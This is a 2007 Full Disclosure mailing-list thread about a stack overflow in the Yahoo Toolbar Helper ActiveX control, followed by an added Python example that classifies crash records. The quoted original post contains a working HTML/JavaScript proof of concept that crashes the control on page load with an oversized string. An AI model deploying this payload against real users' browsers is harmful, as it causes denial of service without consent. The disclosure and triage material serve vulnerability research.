Full Disclosure mailing list archives

Re: Yahoo Toolbar Helper c() Method Stack Overflow DoS
From: "Joey Mengele" <joey.mengele () hushmail com>
Date: Fri, 30 Nov 2007 10:59:37 -0500

Yeah, strange how EIP isn't overwritten with your hacker savvy 0x41 
characters. Except for the fact that this again is a stack overflow 
exception and not a stack based buffer overflow. I implore you, 
LEAVE THE TROLLING TO THE PROFESSIONALS. Thanks.

J

On Wed, 31 Dec 1969 19:00:00 -0500 Elazar Broad 
<elazarb () earthlink net> wrote:
There is a stack overflow in the c() method of the Yahoo Toolbar 
Helper class. This overflow does not appear to get anywhere near 
the EIP or SEH. PoC as follows:

----------------------
<!--
written by e.b.
-->
<html>
<head>
 <script language="JavaScript" DEFER>
   function Check() {
   var s = "AAAA";

    while (s.length < 999999) s=s+s;

    var obj = new ActiveXObject("yt.ythelper.2"); //{02478D38-C3F9-4EFB-9B51-7695ECA05670}
     obj.c(s);
  }
 </script>

</head>
<body onload="JavaScript: return Check();">
</body>
</html>
----------------------

Elazar

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
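
The distinction argued in this thread (a stack overflow exception, i.e. stack exhaustion, versus a stack-based buffer overflow that reaches EIP or SEH) can be written as a crash-triage check. This is an added example, not code from either poster; the `Crash` record, its field names and the sample values are assumptions constructed for illustration.

```python
from dataclasses import dataclass

# Windows NTSTATUS exception codes
STATUS_ACCESS_VIOLATION = 0xC0000005
STATUS_STACK_OVERFLOW = 0xC00000FD        # thread exhausted its stack
STATUS_STACK_BUFFER_OVERRUN = 0xC0000409  # /GS cookie check failed


@dataclass
class Crash:
    """Hypothetical triage record; the field names are assumptions of this example."""
    code: int         # exception code reported by the debugger
    eip: int          # instruction pointer at the fault
    seh_handler: int  # first handler pointer in the thread's SEH chain
    filler: bytes     # byte values the test input was built from


def from_input(value: int, filler: bytes) -> bool:
    """True if every byte of a 32-bit value is one of the input's filler bytes."""
    return all(b in filler for b in value.to_bytes(4, "little"))


def classify(c: Crash) -> str:
    # Input bytes in EIP or the SEH handler mean control data was overwritten.
    if from_input(c.eip, c.filler) or from_input(c.seh_handler, c.filler):
        return "control data overwritten by input: stack-based buffer overflow"
    if c.code == STATUS_STACK_BUFFER_OVERRUN:
        return "stack buffer overrun caught by /GS check"
    if c.code == STATUS_STACK_OVERFLOW:
        return "stack exhaustion: denial of service"
    return "unclassified: needs manual analysis"


# Constructed sample records, not taken from the thread.
SAMPLES = {
    "exhaustion": Crash(STATUS_STACK_OVERFLOW, 0x10001234, 0x10005678, b"A"),
    "smashed_eip": Crash(STATUS_ACCESS_VIOLATION, 0x41414141, 0x10005678, b"A"),
    "smashed_seh": Crash(STATUS_ACCESS_VIOLATION, 0x10001234, 0x41414141, b"A"),
    "gs": Crash(STATUS_STACK_BUFFER_OVERRUN, 0x10001234, 0x10005678, b"A"),
}

if __name__ == "__main__":
    for name, crash in SAMPLES.items():
        print(f"{name:12} -> {classify(crash)}")
```

The check is a coarse first pass: a record that falls through to "unclassified" still needs a debugger session.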
